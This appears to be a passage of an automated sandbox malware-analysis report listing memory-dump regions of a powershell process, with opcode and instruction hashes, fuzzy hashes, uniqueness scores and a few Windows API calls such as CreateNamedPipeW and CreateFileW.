                                                        • Opcode ID: ba3f999dbcf97adf73db92b6d0193cf741ae76a07a41a4062cf8f897d9a74ed4
                                                        • Instruction ID: 2229f05e046538dbcb15f66ff045c3afab6fc76992e0fa591085810c11c727d0
                                                        • Opcode Fuzzy Hash: ba3f999dbcf97adf73db92b6d0193cf741ae76a07a41a4062cf8f897d9a74ed4
                                                        • Instruction Fuzzy Hash: 3A422974A01219CFDB24DF74C854BAEB7B2BF85305F1086A9E809AB390DB75AD81CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2a979a9d0170c07c20dd3db58144a2d468fd98f70996739885ae56449c3518f
                                                        • Instruction ID: fc4b5fb6b3f47d90ee822d8f2a62bfce2d952abdec60b667993739c6b6cceef8
                                                        • Opcode Fuzzy Hash: e2a979a9d0170c07c20dd3db58144a2d468fd98f70996739885ae56449c3518f
                                                        • Instruction Fuzzy Hash: 51229EB0E10206CFDB18DF79C984AAEB7B2BF84304F108569E8259B395EB35ED45CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 080D5980
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431476098.00000000080D0000.00000040.00000001.sdmp, Offset: 080D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_80d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateNamedPipe
                                                        • String ID:
                                                        • API String ID: 2489174969-0
                                                        • Opcode ID: 5e90dfca2e52413ce61e3264ee63dc56f2dc94cb8b0933b0e9e28f5976b3b5ee
                                                        • Instruction ID: fda16f0f6af08ca2adfb7b2b5f8c48b25b07b0406a0782b84f82dbf4576af9a2
                                                        • Opcode Fuzzy Hash: 5e90dfca2e52413ce61e3264ee63dc56f2dc94cb8b0933b0e9e28f5976b3b5ee
                                                        • Instruction Fuzzy Hash: 8E5103B0D013489FDB14CFA9D884BDEFBF2AF88314F24852AE818AB260D7759841CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6F7A7,00000000,00000000,00000003,00000000,00000002), ref: 07A6F992
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430981240.0000000007A60000.00000040.00000001.sdmp, Offset: 07A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 3eb41861ecbe0f3af781794e2b0dfe3d7b52377a79f83b3b5aaa5a5f66281277
                                                        • Instruction ID: ab9bce5bba92b7c7b7d01f70ba5c4b65d514f2c78d9602eb8c705897c6358aa5
                                                        • Opcode Fuzzy Hash: 3eb41861ecbe0f3af781794e2b0dfe3d7b52377a79f83b3b5aaa5a5f66281277
                                                        • Instruction Fuzzy Hash: 102137B6D0065AAFCF10CF99D844ADEFBB4FB48310F04852AE928B7610D375A954CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,07A6F7A7,00000000,00000000,00000003,00000000,00000002), ref: 07A6F992
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430981240.0000000007A60000.00000040.00000001.sdmp, Offset: 07A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a60000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 7203f9b697bcc1c60938487d57ff2e11370fabce505a321a7e8e7742122292c2
                                                        • Instruction ID: b31abde09e1cd1a6851cce261403375ea4f33a54e9b6e48f960ff11eeb636a18
                                                        • Opcode Fuzzy Hash: 7203f9b697bcc1c60938487d57ff2e11370fabce505a321a7e8e7742122292c2
                                                        • Instruction Fuzzy Hash: B22148B6D0065AAFCF10CF99D844ADEBBF4FB48310F04851AE918A3610D3749910CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
                                                        • Instruction ID: c5c30f0f9772a5b548806849b8134fff39c2cb0e3dff2b528191dc2ce159149b
                                                        • Opcode Fuzzy Hash: 299d8ca069c02e1cda31b2dd583b0d47558d1916000bebcd3b8c07c85d03b444
                                                        • Instruction Fuzzy Hash: C711C1B27082455FC7119F69D48499B7FF6AFC6310B1B40EAE105DF2A2DA74EC40CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bc1abc7fe23d4ec41c23b69dc8cb9a5c5c0f80f2d67e8cd94322aaa76dd687f
                                                        • Instruction ID: feb786819cfd25c129e66efd23efe8671cd614448203c86067ff9afeed4da520
                                                        • Opcode Fuzzy Hash: 4bc1abc7fe23d4ec41c23b69dc8cb9a5c5c0f80f2d67e8cd94322aaa76dd687f
                                                        • Instruction Fuzzy Hash: 0921D330A01119CFEB69CF74D854B99B7B2BF94205F2099E9E419AB3A1CB74ED81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78f0b4abe2c4c4577fb7105bb4af382c196ee86d4e594978a2715b2857802e87
                                                        • Instruction ID: c7830108ff6cde40a909fa86c160c85dbaf51a384bb0a02c22e29ee6953aa378
                                                        • Opcode Fuzzy Hash: 78f0b4abe2c4c4577fb7105bb4af382c196ee86d4e594978a2715b2857802e87
                                                        • Instruction Fuzzy Hash: FC01DF32B001599FCB14EBB4989A6BF3BBBEBC8300F144469E205CB3A5EFB44D119791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.426120955.0000000000C9D000.00000040.00000001.sdmp, Offset: 00C9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_c9d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4b9e0a96e6588e4dfc63c39d8efe637b3c1365f6cab6102d9a84be9f2fded0d
                                                        • Instruction ID: 44470be93ba3b115e7e3d6d81ea4e4e578b5cf34cb100b377e14c669b88dbb00
                                                        • Opcode Fuzzy Hash: e4b9e0a96e6588e4dfc63c39d8efe637b3c1365f6cab6102d9a84be9f2fded0d
                                                        • Instruction Fuzzy Hash: 1C015E6140E3C05FDB128B258C98B52BFB4EF53224F1D80DBE8959F2A3D2695C48C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.426120955.0000000000C9D000.00000040.00000001.sdmp, Offset: 00C9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_c9d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ae96ea927d66baf6c99b8d2be7a776c73976e9da97ecaf853fa7f9f175287ca
                                                        • Instruction ID: 61df5d7e40b11c030a50f66b69dc1ef8a32f01bbb4464f745085a8cb221222d5
                                                        • Opcode Fuzzy Hash: 6ae96ea927d66baf6c99b8d2be7a776c73976e9da97ecaf853fa7f9f175287ca
                                                        • Instruction Fuzzy Hash: 0D01F7714043449ADF204A66CC887A7BBC8EF41324F189559ED162B282D7799D45C6B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22c2f843cd3e38c92b4a70446d38f6fe5fe8f8a47f90633a20ab9f9fa47c8d06
                                                        • Instruction ID: 3bd05cd03db5842d47a2e69f7ba7475717d88ba39c8d11418cee838423a72ca6
                                                        • Opcode Fuzzy Hash: 22c2f843cd3e38c92b4a70446d38f6fe5fe8f8a47f90633a20ab9f9fa47c8d06
                                                        • Instruction Fuzzy Hash: FC01F730B01264ABD7148B98DC01BBF7F75EF85701F248079F5046B2C2CB745905C7A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cee1610f8d6ae4fc0938e23f46977e525d12326577422cc276dfd708c458e79b
                                                        • Instruction ID: 4d06e9ba8c66bd6638c29bcef6f68309b04b53306ff809c0cbe3654877a17364
                                                        • Opcode Fuzzy Hash: cee1610f8d6ae4fc0938e23f46977e525d12326577422cc276dfd708c458e79b
                                                        • Instruction Fuzzy Hash: 68018C71204619EFC710DF29E4849AAB7F9FF84325B008929E819C7650DB70FD55CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 267c0adde5bb8b0f2e2d48449632d64d4f7311b69d33fd6e35a4d72c98ff4ccc
                                                        • Instruction ID: 5142d3514f2c5207c82c8e2f2474eacc82113e6ca24f7086c94180eed122c817
                                                        • Opcode Fuzzy Hash: 267c0adde5bb8b0f2e2d48449632d64d4f7311b69d33fd6e35a4d72c98ff4ccc
                                                        • Instruction Fuzzy Hash: D401B1B0A053A99AEB15DFA4C4057EFBBF76F85708F140469E04177681CBB9A904C7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d52dfc690644662f03a78a4bdc39cd1b27c317e67ffba40f7488d3c36b17d38
                                                        • Instruction ID: df6d0d2f953dfe46fffd1140e782211da0429530497f03eb276426cc143fc06b
                                                        • Opcode Fuzzy Hash: 9d52dfc690644662f03a78a4bdc39cd1b27c317e67ffba40f7488d3c36b17d38
                                                        • Instruction Fuzzy Hash: BBF05E352097408FD3299B35E854463BBB6FFC6211329C5BDE49A8B3A5CA39D842CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b9538f801d9c91a0362dee71fa6a1436830b38ee82488d0fb4b66dd175065615
                                                        • Instruction ID: bfc5dc64a9329d76ab01e0dd33c91985dc9537b569cfdb1efdef6feee3af4898
                                                        • Opcode Fuzzy Hash: b9538f801d9c91a0362dee71fa6a1436830b38ee82488d0fb4b66dd175065615
                                                        • Instruction Fuzzy Hash: B2F01CB2A10208EFEF62CF84DD40BE97B71FB49350F4440A6F61596160DB769AA0DF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c6784105b90b08d42a70cbba0d229a931213b047e8247a6e47d512cf70c54d4
                                                        • Instruction ID: a1ed6a268ff45f2cccc540121767203228db1fa822564128754401533c6b8028
                                                        • Opcode Fuzzy Hash: 7c6784105b90b08d42a70cbba0d229a931213b047e8247a6e47d512cf70c54d4
                                                        • Instruction Fuzzy Hash: B6E026323004248FC3148A4AF400A6673A9EFC4B15B0400BAD40587B24CB60FC1283F0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.430933379.0000000007A30000.00000040.00000010.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b15a4814414906171609a1a3a9d6def42e187d3e7e2c50c66cb7fb42cc00863
                                                        • Instruction ID: 53bbe5d71cd589adad9886075dbed949a071424fdc11dfe41903d1ccddb3e09c
                                                        • Opcode Fuzzy Hash: 5b15a4814414906171609a1a3a9d6def42e187d3e7e2c50c66cb7fb42cc00863
                                                        • Instruction Fuzzy Hash: B5E0E22140E3C25FC3038B304C64896BFB1EE9730070A84EBE0D0CA0ABC2394828DB22
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c34f8456f537f0cf1772c875a95c3e0708150f00664cee50c4b16e7cbbef5654
                                                        • Instruction ID: b0b352eda7c981e08100eef70ecc48985dfc4b47d57c8f50fbedaaf6fe588729
                                                        • Opcode Fuzzy Hash: c34f8456f537f0cf1772c875a95c3e0708150f00664cee50c4b16e7cbbef5654
                                                        • Instruction Fuzzy Hash: 35C012313100344BC604965CE44499937DDDB89729B4100B6E509CB761CA92EC4147E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa80c569ff41cdde96200bca499ac58b5b10cb0febedf50ee6e3772b9219e2cc
                                                        • Instruction ID: 9588d80295e134b01de9487e3431b34a7d07fb0b3da91c5481494c051f4d10a2
                                                        • Opcode Fuzzy Hash: aa80c569ff41cdde96200bca499ac58b5b10cb0febedf50ee6e3772b9219e2cc
                                                        • Instruction Fuzzy Hash: 3BD0927460A2C28FCB02CB64D554400FFA2BA5639232AC3D6D485CB257C6249856CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.431515155.0000000008120000.00000040.00000001.sdmp, Offset: 08120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4f6bc92c81fca3e9f8210500505c20ce3b80c9f844432021e8f7edc34565437
                                                        • Instruction ID: c12c652112d6a451ab5d798909f4a59d8234322c5331aaf0f5b05f60aeb538a2
                                                        • Opcode Fuzzy Hash: f4f6bc92c81fca3e9f8210500505c20ce3b80c9f844432021e8f7edc34565437
                                                        • Instruction Fuzzy Hash: 0CC08C3AF010098FCB00CB94F8848DCF776FBC8325B00C062E10183101C7319021DB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions